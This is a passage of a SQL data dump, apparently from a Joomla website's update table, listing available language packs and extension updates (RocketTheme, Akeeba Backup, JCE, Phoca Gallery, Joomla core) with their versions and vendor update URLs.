Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(33222,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(33223,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(33224,3,0,'Danish','','pkg_da-DK','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(33225,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(33226,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(33227,3,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(33228,3,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(33229,3,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(33230,3,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(33231,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(33232,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(33233,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(33234,3,0,'French','','pkg_fr-FR','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(33235,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(33236,3,0,'German','','pkg_de-DE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(33237,3,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(33238,3,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(33239,3,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(33240,3,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(33241,3,0,'Greek','','pkg_el-GR','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(33242,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(33243,3,0,'Italian','','pkg_it-IT','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(33244,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(33245,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(33246,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(33247,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(33248,3,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(33249,3,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.10.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(33250,3,0,'Polish','','pkg_pl-PL','package','',0,'3.10.6.3','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(33251,3,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(33252,3,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(33253,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(33254,3,0,'Russian','','pkg_ru-RU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(33255,3,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(33256,3,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(33257,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(33258,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(33259,3,0,'Spanish','','pkg_es-ES','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(33260,3,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(33261,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(33262,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(33263,3,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(33264,3,0,'Thai','','pkg_th-TH','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(33265,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(33266,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(33267,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(33268,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(33269,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','https://updates.rockettheme.com/joomla/138/b61e70db','',''),(33270,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/138/2084920890','',''),(33271,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','https://updates.rockettheme.com/joomla/286/21ffe006','',''),(33272,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/286/326466299','',''),(33273,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','https://updates.rockettheme.com/joomla/287/cb577720','',''),(33274,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.16','0802','https://updates.rockettheme.com/joomla/301/dfc993d8','',''),(33275,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(33276,20,0,'RokGallery','','','component','',0,'2.46','0802','https://updates.rockettheme.com/joomla/313/1985305838','',''),(33277,20,0,'RokWeather','','','module','',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/313/1307741342','',''),(33278,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','https://updates.rockettheme.com/joomla/313/1301311221','',''),(33279,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/381/337128173','',''),(33280,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/559/1033ef39','',''),(33281,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(33282,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(33283,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(33284,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(33285,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(33286,57,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(33287,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(33288,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(33289,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(33290,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(33291,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(33292,57,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(33293,57,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(33294,57,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(33295,57,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(33296,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(33297,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(33298,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(33299,57,0,'French','','pkg_fr-FR','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(33300,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(33301,57,0,'German','','pkg_de-DE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(33302,57,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(33303,57,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(33304,57,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(33305,57,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(33306,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(33307,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(33308,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(33309,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(33310,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(33311,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(33312,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(33313,57,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(33314,57,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.10.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(33315,57,0,'Polish','','pkg_pl-PL','package','',0,'3.10.6.3','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(33316,57,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(33317,57,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(33318,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(33319,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(33320,57,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(33321,57,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(33322,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(33323,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(33324,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(33325,57,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(33326,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(33327,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(33328,57,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(33329,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(33330,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(33331,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(33332,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(33333,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(33334,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33335,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'5.1.3','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-5-1-3			\n		',''),(33336,129,0,'JCE 2.9.29','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.29','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-29-released',''),(33337,130,0,'T3 System Plugin','','t3','plugin','system',0,'3.1.0','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml','http://www.joomlart.com/update-steps',''),(33338,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(33339,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33340,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33341,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33342,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33343,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33344,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33345,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33346,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33347,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33348,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33349,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33350,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33351,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33352,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33353,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33354,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33355,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33356,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33357,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33358,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33359,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33360,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33361,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33362,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33363,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33364,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33365,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33366,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33367,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33368,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33369,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33370,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33371,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33372,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33373,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33374,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33375,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33376,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33377,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33378,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33379,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33380,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33381,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33382,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33383,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33384,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33385,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33386,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(33387,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(33388,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(33389,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(33390,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(33391,3,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(33392,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(33393,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(33394,3,0,'Danish','','pkg_da-DK','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(33395,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(33396,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(33397,3,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(33398,3,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(33399,3,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(33400,3,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(33401,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(33402,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(33403,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(33404,3,0,'French','','pkg_fr-FR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(33405,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(33406,3,0,'German','','pkg_de-DE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(33407,3,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(33408,3,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(33409,3,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(33410,3,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(33411,3,0,'Greek','','pkg_el-GR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(33412,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(33413,3,0,'Italian','','pkg_it-IT','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(33414,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(33415,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(33416,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(33417,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(33418,3,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(33419,3,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(33420,3,0,'Polish','','pkg_pl-PL','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(33421,3,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(33422,3,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(33423,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(33424,3,0,'Russian','','pkg_ru-RU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(33425,3,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(33426,3,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(33427,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(33428,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(33429,3,0,'Spanish','','pkg_es-ES','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(33430,3,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(33431,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(33432,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(33433,3,0,'Tamil, 